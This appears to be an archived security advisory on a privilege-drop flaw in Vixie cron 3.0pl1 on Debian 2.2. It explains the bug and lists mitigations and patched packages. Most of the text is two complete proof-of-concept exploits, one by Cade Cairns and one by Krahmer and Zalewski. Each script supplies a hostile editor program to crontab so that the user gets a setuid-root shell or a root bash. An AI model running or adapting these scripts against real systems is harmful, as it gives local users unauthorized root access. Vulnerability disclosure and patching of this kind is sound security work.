COMMAND
Vixie
SYSTEMS AFFECTED
Vixie 3.0pl1 (Debian 2.2)
PROBLEM
Cade Cairns found following. Attached is a simple proof of
concept for the vixie cron vulnerability recently published in
Debian Security Advisory DSA-054-1. The code was written during
SIA analysis of this vulnerability.
Vulnerable found is Paul Vixie Vixie Cron 3.0pl1. Local users can
cause Vixie crontab to fail to drop privileges when editing files.
Can lead to full system compromise. Local users can manipulate
crontab's lowering of privileges, leading to full system
compromise.
Vixie cron is an implementation of the popular UNIX program that
runs user-specified programs at periodic scheduled times. A
serialization error exists in some versions of the crontab file
maintenance program. The vulnerability was introduced in versions
which were patched for seperate vulnerability in fall of 2000.
When a parsing error occurs after a modification operation,
crontab will fail to drop privileges correctly for subsequent
modification operations. Because the program is installed setuid
root, it may be possible for a local user to gain root privileges.
An attacker with local access must edit their crontab file and
enter a line that causes the parser to fail.
The attacker must then enter 'yes' when prompted as to whether he
or she wishes to attempt to fix the error in the file. This will
cause the editor to be invoked again, but with full privileges.
The attacker could then execute arbitrary commands from the
editor, or overwrite otherwise protected system files.
Cade Cairns wrote proof-of-concept exploit code:
#!/bin/sh
#
# cronboom - simple proof-of-concept exploit for vixie cron version 3.1pl1
#
# affected versions:
# cron_3.0pl1-57.2 distributed with Debian Linux 2.2.
#
# note that copies of the program with the patch mentioned above are likely
# to also be vulnerable.
#
# 05/07/01 cairnsc@securityfocus.com
CRONTAB=/usr/bin/crontab
if ! test -x $CRONTAB; then
echo "** unable to locate crontab executable, exiting"
exit 1
fi
cat > vcsh.c << EOF
#include <unistd.h>
int main() {
setuid(0);
setgid(0);
execl("/bin/sh", "sh", NULL);
}
EOF
echo "** compiling shell wrapper as $PWD/vcsh"
cc -o $PWD/vcsh $PWD/vcsh.c
if ! test -x $PWD/vcsh; then
echo "** compilation failed, exiting"
exit 1
fi
echo "** creating simple exploit script as $PWD/vcex.sh"
cat > vcex.sh << EOF
#!/bin/sh
sleep 1 && echo "foo" >> \$1
if test -f $PWD/vcboom; then
chown root.root $PWD/vcsh
chmod 4755 $PWD/vcsh
rm $PWD/vcboom
else
touch $PWD/vcboom
fi
EOF
chmod 0755 $PWD/vcex.sh
echo "** running $CRONTAB -e"
echo "**"
echo "** enter 'yes' at the first prompt, then enter 'no' at the second"
echo
(EDITOR=$PWD/vcex.sh $CRONTAB -e)
echo
echo "** done, the shell wrapper should be suid root"
exit 0
Michal Zalewski posted his proof-of-concept he coded for Sebastian
Krahmer (who discovered this vulnerability), while working on it.
This vulnerability affects Debian, SuSE, and probably few other
Linuxes as well. It is a perfect example of bad coding, and how
improper fixing of bugs might lead to even more dangerous
conditions. It is fully automated, and we believe it gives
absolutely nothing to the attacker, as this vulnerability can be
exploited by hand in approximately 5 seconds.
#!/bin/bash
clear
echo ".-----------------------------------------------------------."
echo "| Marchew.Hyperreal presents: vixie crontab exploit #728371 |"
echo "|===========================================================|"
echo "| Sebastian Krahmer <krahmer@security.is> |"
echo "| Michal Zalewski <lcamtuf@coredump.cx> |"
echo "\`-----------------------------------------------------------'"
echo
test "$CRONBIN" = "" && CRONBIN=/usr/bin/crontab
echo ">>> Using binary: $CRONBIN"
echo -n ">>> Setuid check: "
if [ -u $CRONBIN ]; then
echo "PASSED"
else
echo "FAILED"
echo
exit 1
fi
echo -n ">>> Version check: "
QQ=`strings $CRONBIN | grep '43 vixie Exp'`
if [ "$QQ" = "" ]; then
echo "FAILED"
echo
exit 1
else
echo "PASSED"
fi
echo ">>> Building exploit..."
cat >edit0r.c <<_eof_
#include <stdio.h>
int main(int argc,char* argv[]) {
sleep(1);
if (geteuid()) {
FILE* x=fopen(argv[1],"w");
fprintf(x,"blah blah blah\n");
fclose(x);
} else {
dup2(1,0);
dup2(1,2);
printf("\n>>> Entering rootshell, babe...\n");
system("touch $HOME/.xploited");
system("bash");
}
}
_eof_
gcc edit0r.c -o edit0r &>/dev/null
rm -f edit0r.c
if [ ! -f edit0r ]; then
echo ">>> Cannot compile exploit."
echo
exit 1
fi
rm -f ~/.xploited
echo ">>> Performing attack..."
( echo "y"; echo "n" ) | VISUAL=$PWD/edit0r $CRONBIN -e 2>/dev/null
rm -f edit0r
if [ -f ~/.xploited ]; then
echo
echo ">>> Thank you."
rm -f ~/.xploited
echo
exit 0
else
echo
echo ">>> Apparently I am not able to exploit it, sorry..."
echo
exit 1
fi
SOLUTION
Restricting local access to the host may prevent unauthorized
users from exploiting this vulnerability. Restrict access to the
cron faciliy to trusted users via the /etc/cron.allow and
/etc/cron.deny files (man crontab).
For Paul Vixie Vixie Cron 3.0pl1:
http://security.debian.org/dists/stable/updates/main/binary-alpha/cron_3.0pl1-57.3_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/cron_3.0pl1-57.3_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/cron_3.0pl1-57.3_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/cron_3.0pl1-57.3_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/cron_3.0pl1-57.3_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/cron_3.0pl1-57.3_sparc.deb
It should be noted that this problem is not Paul Vixie's fault;
this crept into Debian (and other Linux distributions) through a
broken patch.